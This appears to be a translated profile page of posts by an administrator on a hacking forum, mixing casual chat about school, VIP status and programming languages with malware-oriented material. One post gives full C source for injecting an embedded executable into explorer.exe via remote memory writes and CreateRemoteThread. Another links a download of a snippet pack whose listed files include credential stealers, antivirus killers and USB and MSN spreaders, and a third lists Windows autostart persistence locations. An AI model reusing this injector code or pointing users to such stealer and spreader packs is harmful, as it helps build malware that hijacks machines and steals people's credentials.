Nytro

Administrators

Everything posted by Nytro

  1. Nytro

    Vip

    There used to be some things, stuff still got posted, but times are different now, we no longer have time.
  2. Post some accounts yourself, since you have so many and nothing to do with them. You will make a few members happy.
  3. Pff, at that rubbish InfoEducatie contest, when I took part, the jury had no idea what PHP even is. No need to even mention FTP or PHPMyAdmin. Some 3-lei Flash pieces won, of course, because they were colorful... PS: You can't say you know a programming language from what you do at school. At school you do very little programming; at school you do algorithmics.
  4. C++ (or rather C) or Assembly. That's because, in general, programmers who work in C++, and especially in Assembly, are much more experienced.
  5. Based on how smart they are, based on invitations, based on who holds their drink better... Why should there be a particular requirement to be a member of the forum? Is it that important to be a member here? What would they have to gain? I'd say let's ask them for money then...
  6. Nytro

    Vip

    I don't really understand why you want VIP... Well, let me see, if I go fifty-fifty with kwe, or has he quit drinking...?
  7. Nytro

    How you can cheat...

    I got myself some memorandums, I think they're called, small-format booklets with small print and lots of nonsense in them. But for math they are suggested solutions, they won't be this year's subjects... I'm scared of math... And still I don't know whether to risk cheating (if it's "dangerous"). I'd rather get a 5 (in math I don't know if I'll manage it) and be content.
  8. Nytro

    Spread.

    If you come from hellsoft and hackforums then it's clear, I bow before you.
  9. In theory you can make viruses in HTML too. <a href="aaaaaaa_nops_shellcode">A</a> And the browser engine would have to be bad, to have a buffer overflow
  10. Nytro

    Vip

    I want a small keg of Carlsberg
  11. There are plenty who have nothing to do at home, xcata, and they just want attention. In practice you can use any language from which you can call an API function. Visual Basic is used because it's practically simpler, easier to learn. C++ is "cooler". And I think the main advantage is pointers. And the fact that for C++ those headers already exist. You just include <window.h> and call the function, you don't have to declare it. But broadly, what you can do in C++ (almost anything, I think not quite anything) you can also do in Visual Basic, or C#, or another programming language.
  12. Well, it is important. I want to see which of the hotshots above is smarter.
  13. I think I'll ban all of you, since I see you're too smart for this world...
  14. The driver the kernel has offers only read-only support for NTFS. But ntfs-3g offers read-write support. Yes, they had to be mounted if they weren't mounted automatically, as a modern operating system should do... I see this as a black mark for backtrack. Well, and one for Tinky.
  15. I was looking at the faces of these guys from corelan, and they seem a bit odd to me
  16. Some of us have the baccalaureate exam. I'll be more "involved" after I finish with the baccalaureate and then the admission exam. It will stay as it is now for a while.
  17. Interesting. And he is the one who discovered it: http://www.corelan.be:8800/wp-content/uploads/2010/03/tecr0cFace1.jpg
  18. Actually they were posted there too by someone who had taken them from somewhere else. Opensc is not exactly programmers' heaven.
  19. If it's not a lot of work, I'm in. I'm not that great at CSS, though, but I manage
  20. Nytro

    Snippets

    Source: http://www.opensc.ws/snippets/10961-release-w0rmys-codebase-v2-0-a.html Snippets: Bash - Backup Script.txt Bash - Battery Life.txt Bash - BlackJack.txt Bash - Change (mask) the MAC address on your nic.txt Bash - Detect then eject the cdrom.txt Bash - File Limiter.txt Bash - PPP Connection Checker.txt Bash - Recursive Linecount in directory.txt Bash - Resolve&Display your IP Address.txt Bash - Retreive the complete list of ports.txt Bash - Setting up common aliases.txt Bash - Simple Bash backup script.txt Bash - Simple firewall script.txt Bash - Take Screenshots of Xwindows.txt C# - Add proxy support to webbrowser.txt C# - Anti Sandboxie.txt C# - AntiSandboxie.txt C# - Anti ThreatExpert.txt C - Binary Adder.txt C# - Calculate an exponent.txt C# - CD Key Stealer.txt C# - Check Avaible Posts.txt C# - Check for 64bits OS.txt C# - Check if a file is already open (or read only).txt C# - Check if a printer is offline or online.txt C# - Check if a process is running.txt C# - Check if the CD-ROM is loaded.txt C# - Count vowels in a string.txt C# - Create a new net user.txt C# - Create local Windows user account.txt C - Creates a magic square.txt C - DateTime with windows.h.txt C# - Delete registry key value in HKEY_CLASSES_ROOT.txt C# - Delete Self.txt C# - Desactivate UAC.txt C# - Disable Task Manager.txt C++ - Disable Task Manager.txt C# - Downloader.txt C - Echo.txt C# - Empty Recycle Bin.txt C# - Encryption Class.txt C# - EOF Data.txt C# - FileZilla Stealer.txt C# - Generate a random color with XNA.txt C# - Generate password.txt C# - Get 3 letters computer country name.txt C# - Get a file's MD5 Hash.txt C# - Get a HTML Page's Title.txt C# - Get current users profile type (using Win32 API).txt C# - Get Headers from a website.txt C# - Get info about drives installed.txt C# - Get info about physical memory.txt C# - Get IP Information.txt C# - Get recycle bin's size and file count.txt C# - Get RecycleBin's size and file count.txt C# - Gets the contents of a 
pastebin entry by id.txt C# - Getting the HEX.txt C# - Get UNC path of mapped drives.txt C# - Get users default browser.txt C# - Get your Gmail contact list.txt C - Gnome Sort.txt C# - Hiding console window.txt C# - IP address range finder helper class.txt C# - Kill Ad-Adware.txt C# - Kill a process by user.txt C# - Kill Malwarebytes Anti-Malware.txt C# - Kill SpyBot Search&Destroy.txt C# - Mutex.txt C - Name of current user.txt C# - Open Windows Firewall Port.txt C# - Post to Pastebin!.txt C - ReadWord.txt C# - Rendering text with a shadow in XNA.txt C++ - Restart your computer.txt C# - Retrieve all computers on network.txt C# - Retrieve list of avaible printer ports.txt C# - Send Email with Attachment.txt C# - Session for WinForms.txt C# - Set default printer.txt C# - ShiftList.txt C# - Show&Hide desktop icons.txt C# - Show&hide Windows Taskbar.txt C# - Simple 2D line in XNA.txt C# - Split String.txt C# - Static dll injector.txt C# - Take screenshot.txt C# - USB Spread.txt C# - Use WMI to get a list of all installed printers.txt C# - Use WMI to get the system's up-time.txt C# - uTorrent seeder.txt C# - Windows autostart.txt C# - XOR Encryption.txt Delphi - Bytes to real size.txt Delphi - Default Browser.txt Delphi - Disable XP Firewall.txt Delphi - Get File Info.txt Delphi - Ip&Port Check Utility.txt Delphi - Little injection.txt Delphi - Screenshot with mouse position.txt Delphi - Uptime (Spy-Net).txt F# - AES Encryption.txt F# - IRC Bot.txt Lisp - A Clojure function to find the average of an arbitrary number of numbers.txt Lisp - A function to flip the arguments of another function in Clojure.txt Lisp - Compute factorial in Clojure.txt Lisp - Computer Generated HAIKU.txt Lisp - Example of using refs to maintain, alter, and use mutable state in Clojure.txt Lisp - Fibonacci Sequence.txt Lisp - Fibonancci Sequence.txt Lisp - File IO example using c.c.duck-streams in Clojure.txt Lisp - Function to find the max value in a sequence in Clojure.txt Lisp - GPA 
Calculator.txt Lisp - Swing example in Clojure.txt Lisp - Tic-Tac-Toe.txt Python - CS Server Info.txt Python - Get TITLE.txt Python - Google Search.txt Python - IRC Bot (l33t).txt Python - IRC Bot.txt Python - MD5 Search.txt Python - Skype Bot.txt Ruby - Angle Conversion.txt Ruby - Bandwidth Usage in Linux.txt Ruby - Check if a number is prime.txt Ruby - Defficient Number.txt Ruby - Get Confirmation.txt Ruby - Hangman.txt Ruby - Regression Line.txt Ruby - Reverse a string.txt Ruby - ROT13.txt Ruby - Sum of any series.txt Ruby - Sum of Divisors.txt Ruby - Write a number in English.txt VB6 - Admin Check.txt VB6 - Automatic shutdown for windows in VBS.txt VB6 - Change Desktop Settings via registry.txt VB6 - Change System Date Format.txt VB6 - Check if a file exists.txt VB6 - Check if exe is running.txt VB6 - Close all forms in your applications.txt VB6 - Convert Binary To Decimal.txt VB6 - Copy all files from directory to another.txt VB6 - Detect Windows Version.txt VB6 - Disable Ctrl+Alt+Del.txt VB6 - Download a file from the Internet.txt VB6 - Download file using FTP.txt VB6 - DynDNS Stealer.txt VB6 - Easy read&write to Windows registry.txt VB6 - File Download to Temp Dir.txt VB6 - FileZilla Stealer.txt VB6 - Find your application's path.txt VB6 - Get default browser in 5 lines.txt VB6 - Get MSN Passwords.txt VB6 - Get OS Version.txt VB6 - Get Screen Resolution.txt VB6 - Get System Volume Information.txt VB6 - Get Windows Username.txt VB6 - Hangman.txt VB6 - Kill a file in use.txt VB6 - Open&Close CD ROM.txt VB6 - Password Generator.txt VB6 - Prevent a program from running.txt VB6 - Read Registry.txt VB6 - Running Programs Using VBScript.txt VB6 - Send Batch Email.txt VB6 - Show&Hide Taskbar (WINDOWS).txt VB6 - Shutdown Windows.txt VB6 - Simple en&decryption.txt VB6 - String Rotation.txt VB6 - System Start Time.txt VB6 - Tic Tac Toe.txt VB6 - Turn Off Monitor.txt VB6 - Upload file to FTP Server.txt VB6 - Windows Running Time.txt VB6 - Windows XP Task manager 
Disabler&Enabler.txt VB6 - Write to registry.txt VB6 - XOR Encryption Function.txt VB6 - Zip files with WinZip in VB6.txt VB.NET - 4chan spammer.txt VB.NET - Add to startup (Registry).txt VB.NET - Animating Text.txt VB.NET - Anti Modules.txt VB.NET - Auto Crop Image.txt VB.NET - Base64 to image.txt VB.NET - Bomb noise.txt VB.NET - Calculated Click.txt VB.NET - Calender.txt VB.NET - Change Desktop Background.txt VB.NET - Change the language of your application.txt VB.NET - Change Wallpaper.txt VB.NET - Check Battery Status.txt VB.NET - Check if exe is running.txt VB.NET - Check if file is in use.txt VB.NET - Check if username is in use.txt VB.NET - Check URL for availability.txt VB.NET - Check Windows Password.txt VB.NET - Clear IE Browser History&Cookies.txt VB.NET - Convert file size to KB, MB, GB and TB.txt VB.NET - Convert file size to KB,MB,GB, TB.txt VB.NET - Corrupt.txt VB.NET - Cripple EXE.txt VB.NET - Cryptographu - Encryptions&Decryptions.txt VB.NET - Date Extensions.txt VB.NET - Delete Cookies.txt VB.NET - Disable Firewall.txt VB.NET - Disable 'Show Hidden Files and Folders Option'.txt VB.NET - Disable [X], ALT+F4, CTRL+W and context.txt VB.NET - Empty Recycle Bin.txt VB.NET - Enumerate Installed Software.txt VB.NET - FireFTP Passwords.txt VB.NET - Force Steam login.txt VB.NET - Format a phone number.txt VB.NET - FormatWith.txt VB.NET - Generate Captcha.txt VB.NET - Get all table & Column names from database.txt VB.NET - GetBetweenAll.txt VB.NET - GetBetween.txt VB.NET - Get COD4 Key.txt VB.NET - Get default browser path.txt VB.NET - Get External IP.txt VB.NET - Get Folder Size.txt VB.NET - Get how long the computer has been running.txt VB.NET - Get or set Desktop background color.txt VB.NET - Get own Internet IP.txt VB.NET - Get percent value.txt VB.NET - Give file an attribute.txt VB.NET - Handling .ini files.txt VB.NET - Hash.txt VB.NET - Hide a process window.txt VB.NET - Instant PC Shutdown.txt VB.NET - Invert colors from image.txt VB.NET - Log 
file.txt VB.NET - MD5 from file.txt VB.NET - MD5 Hash.txt VB.NET - Melt File - NO DROPS.txt VB.NET - Minimize to tray.txt VB.NET - Mouse Click.txt VB.NET - MsgBox If statement.txt VB.NET - MSN Nickname Changer.txt VB.NET - MSN Spreader.txt VB.NET - Multiple File Copy.txt VB.NET - Null PE Info.txt VB.NET - Packetwise File Copy.txt VB.NET - Polymorphic RC4 Encryption.txt VB.NET - Prevent Search.txt VB.NET - Program Updater.txt VB.NET - ProgressBar code.txt VB.NET - RC4 Encryption.txt VB.NET - Read&Write EOF.txt VB.NET - Resize image to fit in picturebox.txt VB.NET - Resolution Math.txt VB.NET - Screenshot.txt VB.NET - Show system time.txt VB.NET - String & Image Conversion.txt VB.NET - Strip HTML.txt VB.NET - Test for Internet Connection.txt VB.NET - Windows Live Messenger 'Now Playing'.txt Download: http://www.2shared.com/file/tTxgNb0z/Documents.html
  21. I don't know who figured them all out:

      Registry Autostart Locations

      1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
         All values in this key are executed.
      2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\
         All values in this key are executed, and then their autostart reference is deleted.
      3. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\
         All values in this key are executed as services.
      4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
         All values in this key are executed as services, and then their autostart reference is deleted.
      5. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
         All values in this key are executed.
      6. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
         All values in this key are executed, and then their autostart reference is deleted.
      7. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\
         Used only by Setup. Displays a progress dialog box as the keys are run one at a time.
      8. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\
         Similar to the Run key from HKEY_CURRENT_USER.
      9. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\
         Similar to the RunOnce key from HKEY_CURRENT_USER.
      10. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
          The "Shell" value is monitored. This value is executed after you log in.
      11. HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\
          All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey.
      12. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\
          All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey.
      13. HKEY_CURRENT_USER\Control Panel\Desktop
          The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates.
      14. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
          The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts.
      15. HKEY_CLASSES_ROOT\vbsfile\shell\open\command\
          Executed whenever a .VBS file (Visual Basic Script) is run.
      16. HKEY_CLASSES_ROOT\vbefile\shell\open\command\
          Executed whenever a .VBE file (Encoded Visual Basic Script) is run.
      17. HKEY_CLASSES_ROOT\jsfile\shell\open\command\
          Executed whenever a .JS file (Javascript) is run.
      18. HKEY_CLASSES_ROOT\jsefile\shell\open\command\
          Executed whenever a .JSE file (Encoded Javascript) is run.
      19. HKEY_CLASSES_ROOT\wshfile\shell\open\command\
          Executed whenever a .WSH file (Windows Scripting Host) is run.
      20. HKEY_CLASSES_ROOT\wsffile\shell\open\command\
          Executed whenever a .WSF file (Windows Scripting File) is run.
      21. HKEY_CLASSES_ROOT\exefile\shell\open\command\
          Executed whenever a .EXE file (Executable) is run.
      22. HKEY_CLASSES_ROOT\comfile\shell\open\command\
          Executed whenever a .COM file (Command) is run.
      23. HKEY_CLASSES_ROOT\batfile\shell\open\command\
          Executed whenever a .BAT file (Batch Command) is run.
      24. HKEY_CLASSES_ROOT\scrfile\shell\open\command\
          Executed whenever a .SCR file (Screen Saver) is run.
      25. HKEY_CLASSES_ROOT\piffile\shell\open\command\
          Executed whenever a .PIF file (Portable Interchange Format) is run.
      26. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
          Services marked to startup automatically are executed before user login.
      27. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_Entries\
          Layered Service Providers, executed before user login.
      28. HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline
          Executed when a 16-bit Windows executable is executed.
      29. HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline
          Executed when a 16-bit DOS application is executed.
      30. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
          Executed when a user logs in.
      31. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\
          Executed by explorer.exe as soon as it has loaded.
      32. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
          Executed when the user logs in.
      33. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
          Executed when the user logs in.
      34. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\
          Subvalues are executed when Explorer initialises.
      35. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\
          Subvalues are executed when Explorer initialises.

      Folder Autostart Locations

      1. windir\Start Menu\Programs\Startup\
      2. User\Startup\
      3. All Users\Startup\
      4. windir\system\iosubsys\
      5. windir\system\vmm32\
      6. windir\Tasks\

      File Autostart Locations

      1. c:\explorer.exe
      2. c:\autoexec.bat
      3. c:\config.sys
      4. windir\wininit.ini
      5. windir\winstart.bat
      6. windir\win.ini - [windows] "load"
      7. windir\win.ini - [windows] "run"
      8. windir\system.ini - [boot] "shell"
      9. windir\system.ini - [boot] "scrnsave.exe"
      10. windir\dosstart.bat
      11. windir\system\autoexec.nt
      12. windir\system\config.nt

      I hope it helps you
  22. Author: #Zero Zero: Well, this code inject the executable that it has on resource section into 'explorer.exe' process. The code really injects the executable, this will not create a new 'explorer.exe' process. #pragma comment (linker,"/NODEFAULTLIB") #pragma comment (linker,"/ENTRY:main") #include <windows.h> #include <Tlhelp32.h> #include "resource.h" int main() { PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INTH; PIMAGE_SECTION_HEADER ISH; //Cargamos el resource HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE"); DWORD ResourceSize=SizeofResource(NULL,hResource); HGLOBAL hGlob=LoadResource(NULL,hResource); LPSTR lpFileMaped=(LPSTR)LockResource(hGlob); //Obtenemos la cabecera DOS y PE en las estructuras IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0]; INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew]; DWORD PID=0; HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 pInfo; pInfo.dwSize=sizeof(PROCESSENTRY32); //Obtenemos el PID del 'explorer.exe' Process32First(hSnapshot,&pInfo); for(;lstrcmpA(pInfo.szExeFile,"explorer.exe") { Process32Next(hSnapshot,&pInfo); } CloseHandle(hSnapshot); PID=pInfo.th32ProcessID; //Abrimos el proceso en el que nos inyectaremos HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID); //Creamos el buffer del tamaño del SizeOfImage en el que cargaremos el ejecutable LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE); //Copiamos la cabecera DOS y PE al buffer WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0); //Copiamos las secciones en su VirtualOffset en el buffer for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0); } //Calculamos el 
delta entre la dirección del buffer y el ImageBase DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase); //------------------------------------------------------------ /* -Reubicamos la dirección base del ejecutable <img src="http://zero.serhackernoesilegal.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley"> - */ //------------------------------------------------------------ //Si no hay tabla de reubicación, salimos if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0) { MessageBoxA(0,"No hay relocation table!",0,0); return false; } //Obteemos el Image Base Relocation //Copiamos el Image Base Relocation de los datos en el proceso a un buffer en el nuestro para //poder trabajar con él más comodamente PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION)); PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0); //Vamos recorriendo todas las etradas del bloque for (DWORD n=0;IBR->VirtualAddress>0;n++) { //Obtenemos el Bloque de reubicación LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress); //Obtenemos la primera entrada del bloque LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION)); //Recorremos todas las entradas del bloque for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++) { WORD valor; ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0); //Obtenemos los 4 bits que definen el tipo de reubicación DWORD type=valor>>12; //Obtenemos los 12 bits que definen la dirección de la reubicación DWORD offset=valor&0xFFF; //Si el tipo de reubicación es relativo a la dirección base, añadimso el delta if(type==IMAGE_REL_BASED_HIGHLOW) { //Añadimos a la dirección que depende del imagebase original //el delta entre el imagebase y 
nuestra dirección base LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset); DWORD NewValue; ReadProcessMemory(hProcess,newAddr,&NewValue,4,0); NewValue+=Delta; WriteProcessMemory(hProcess,newAddr,&NewValue,4,0); } } //Vamos al siguiente bloque PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock); ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0); } GlobalFree(IBR); //--------------------------------------------------------------------- /* -Cargamos los valores de la IAT para poder llamar a las apis- */ //--------------------------------------------------------------------- PIMAGE_THUNK_DATA ITD; PIMAGE_THUNK_DATA PITD; PIMAGE_IMPORT_BY_NAME IIBN; //Comprobamos si hay Import Data Descriptor if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0) { //Obtenemos el Import Data Descriptor //Copiamos el Import Data Descriptor de los datos en el proceso a un buffer en el nuestro para //poder trabajar con él más comodamente PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR)); PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0); //Vamos recorriendo todas las Dll's importadas por el ejecutable for (;IID->Name;) { //Obtenemos la longitud del nombre de la dll DWORD szName=0; CHAR miByte=1; for(int i=0;miByte;i++) { szName=i; ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0); } //Obtenemos el nombre de la dll LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1); ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0); //Cargamos la dll HMODULE hLib=LoadLibraryA(lpName); //Obtenemos la dirección al primer miembro del array Image Thunk Data's PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk); ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA)); 
ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0); //Vamos recorriendo las funciones importadas for (;ITD->u1.Ordinal;) { miByte=1; //Obtenemos la longitud del nombre de la API for(int i=0;miByte;i++) { szName=i; LPSTR puntero=ExeBuffer+ITD->u1.Function+2; puntero+=i; ReadProcessMemory(hProcess,puntero,&miByte,1,0); } //Cargamos el Image Import By Name para obtener el nombre IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName); ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0); //Obtenemos la dirección de la función y la guardamos en la IAT DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name); WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Error HERE!*/ PITD++; ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0); } PIID++; ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0); GlobalFree(lpName); GlobalFree(ITD); } GlobalFree(IID); } //Obteemos el EntryPoint de ejecutable que cargamos en el buffer DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint; //Llamamos al EntryPoint CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0); return 0; } Some users told me that with some executables the code is not running. I tried to fix it for a long time, but i couldn't do it yet, so with executables who uses de C Run Time Library or some similar, code could fail. Furthermore, I let a anti-kiddie mistake, marked with a "Error Here" comment. Zero
  23. It's fashionable to have lots of hacking programs on your computer, even though you don't even know what they do. Still, this is a good idea too; when you need something, you find it quickly.
  24. There's a difference between "infected" and "detected".
  25. A "cute" method of dynamic calling. I don't know the author; I think it's "Skillless".

        #include <windows.h>

        int main()
        {
            /* Resolve the function address at run time instead of linking to it */
            HINSTANCE Dll = LoadLibrary("user32.dll");
            DWORD(*Func)(void) = (DWORD(*)(void))GetProcAddress(Dll, "MessageBoxA");

            HWND A = 0;
            LPCTSTR B = "Question?";
            LPCTSTR C = "Title!";
            UINT D = MB_ICONEXCLAMATION | MB_YESNO;

            /* Push the four arguments by hand, last argument first (32-bit x86, GCC inline asm) */
            asm("push %0" :: "r"(D));
            asm("push %0" :: "r"(C));
            asm("push %0" :: "r"(B));
            asm("push %0" :: "r"(A));

            Func();

            /* Pops as in the original post; MessageBoxA is stdcall and has already removed its arguments */
            asm("pop %0" :: "r"(A));
            asm("pop %0" :: "r"(B));
            asm("pop %0" :: "r"(C));
            asm("pop %0" :: "r"(D));

            FreeLibrary(Dll);
            return 0;
        }

      You can figure out for yourselves what it does, which function it calls and how.